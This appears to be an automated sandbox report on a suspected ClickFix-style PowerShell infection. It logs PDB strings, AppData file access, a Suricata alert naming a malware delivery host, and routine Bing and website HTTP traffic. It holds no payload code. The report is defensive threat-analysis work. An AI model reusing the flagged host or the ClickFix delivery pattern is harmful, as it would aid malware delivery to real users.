                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=>sw source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 61934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16B2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16C7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA1685000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.1611645953.0000015DA1685000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 0000000F.00000002.1611823408.0000015DA16F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1611588031.0000015DA15A2000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2058473 - Severity 1 - ET MALWARE Observed ClickFix Powershell Delivery Page Inbound : 167.172.78.216:443 -> 192.168.2.16:49730
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=r&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=9c4e8c753a3d4e7fadda4bc28511360c&ig=f4f3e497f6eb4eec930ca8b8785a48e6 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=9c4e8c753a3d4e7fadda4bc28511360c&ig=eb7d549459954dd39ed10936947be2fb HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
                    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powers&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=59214347d6454a08a0fe303b473b2103 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaU
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powersh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=7c9fde3d22a6481da34c89f0a5f7b62f HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!Cortana
                    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powershe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=7c5908c3e3304b66be6d95f63909a1bb HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!Cortan
                    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241236x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: nullx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding: identity
                    Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241236x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                    Source: global trafficHTTP traffic detected: GET /our-story HTTP/1.1host: www.elevate.incsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.schunk.36b8fb49256177c8.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=6537d1496ae55969d9298a91 HTTP/1.1host: d3e54v103j8qbb.cloudfront.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/css/elevate-redesign.shared.cb8a3df76.min.css HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.9f6e0829.939bacf454813a58.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /use-cases/benefit-platforms HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
                    Source: global trafficHTTP traffic detected: GET /widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo HTTP/1.1Host: cdn.embedly.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /19524073.js HTTP/1.1host: js.hs-scripts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /npm/@finsweet/cookie-consent@1/fs-cc.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
